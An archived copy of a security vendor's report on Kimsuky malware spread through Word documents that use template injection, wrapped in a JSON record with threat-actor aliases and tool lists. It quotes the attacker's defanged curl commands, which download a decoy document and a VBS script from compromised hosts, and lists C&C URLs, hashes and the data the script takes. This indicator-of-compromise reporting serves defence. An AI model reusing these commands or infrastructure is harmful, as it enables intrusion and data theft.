{
	"id": "9109ee3a-83d3-4731-b0bf-9a7a94c71cab",
	"created_at": "2026-04-06T00:08:21.169334Z",
	"updated_at": "2026-04-10T03:37:41.140248Z",
	"deleted_at": null,
	"sha1_hash": "f40864fa3082851351ddf5e46cbd7f93c212305e",
	"title": "Malware Disguised as Normal Documents (Kimsuky) - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2435741,
	"plain_text": "Malware Disguised as Normal Documents (Kimsuky) - ASEC\r\nBy ATCP\r\nPublished: 2023-02-02 · Archived: 2026-04-05 18:38:29 UTC\r\nThe ASEC analysis team has recently discovered that the malware introduced in the post \u003cMalware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers)\u003e is being distributed to broadcasting companies and ordinary companies as well as to those in the security-related field. Identical to the malware introduced in the blog post above, all the malicious documents use the template injection technique and download malicious Word macro documents in order to execute. The distributed filenames are as follows:\r\n[kbs Sunday Diagnosis] Questionnaire.docx\r\nIm ** Cover Letter.docx\r\napp-planning – copy.docx\r\nhttps://asec.ahnlab.com/en/47585/\r\nPage 1 of 5\r\nTo facilitate the execution of the malicious macro code, the threat actor used an image that prompts users to enable the macro. The same image has been used in earlier campaigns, so all of the documents are suspected to come from the same operator.\r\nBelow is a list of download URLs of the malicious Word macro documents we have additionally identified.\r\nhxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm\r\nhxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm\r\nhxxp://jooshineng[.]com/gnuboard4/adm/img/ghp/up/state.dotm\r\nhxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm\r\nhxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm\r\nWhen the malicious macro inside the downloaded document is executed, it creates and runs the file version.bat, which contains curl commands. The batch file includes code that downloads and executes a normal (decoy) document and an additional malicious script. The curl commands used are as follows.\r\ncurl -o “”” \u0026 fname \u0026 “”” hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/state.docx\r\ncurl -o %temp%\\temp.vbs hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60\r\nThe confirmed normal documents were disguised as cover letters, application proposals, and more.\r\nIdentical to the previous findings, the additional malicious script leaks the following data to the C\u0026C server and performs the following actions:\r\nInfected PC system information\r\nInformation on anti-virus products installed on the system\r\nList of recently opened Word files\r\nDirectory listing of the Downloads folder on the system\r\nInformation on running processes\r\nModification of IE-related registry keys\r\nRegistration of a task in the task scheduler to maintain a connection to the C\u0026C server\r\nThe confirmed C\u0026C URLs are as follows.\r\nhxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/show.php\r\nhxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/show.php\r\nhxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/show.php\r\nRecently, malware that targets North Korea-related individuals is also being distributed to ordinary corporate users, who should therefore take the utmost precaution. Users must refrain from viewing emails from unknown senders and take care that macros included in Office documents do not run automatically.\r\n[File Detection]\r\nDownloader/DOC.External (2023.02.03.03)\r\nDownloader/DOC.Kimsuky (2023.02.07.00)\r\nMD5\r\n3cdf9f829ed03e1ac17b72b636d84d0b\r\n55a46a2415d18093abcd59a0bf33d0a9\r\n705ef00224f3f7b02e29f21eb6e10d02\r\n83b4d96fc75f74bb589c28e8a9eddbbf\r\n873b2b0656ee9f6912390b5abc32b276\r\nURL\r\nhttp[:]//ddim[.]co[.]kr/gnuboard4/adm/cmg/upload/init[.]dotm\r\nhttp[:]//gdtech[.]kr/gnuboard4/adm/cmg/attatch/init[.]dotm\r\nhttp[:]//gdtech[.]kr/gnuboard4/adm/cmg/upload/list[.]php?query=60\r\nhttp[:]//www[.]hydrotec[.]co[.]kr/bbs/img/cmg/upload2/init[.]dotm\r\nhttp[:]//www[.]hydrotec[.]co[.]kr/bbs/img/cmg/upload3/init[.]dotm\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/47585/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/47585/"
	],
	"report_names": [
		"47585"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434101,
	"ts_updated_at": 1775792261,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f40864fa3082851351ddf5e46cbd7f93c212305e.pdf",
		"text": "https://archive.orkl.eu/f40864fa3082851351ddf5e46cbd7f93c212305e.txt",
		"img": "https://archive.orkl.eu/f40864fa3082851351ddf5e46cbd7f93c212305e.jpg"
	}
}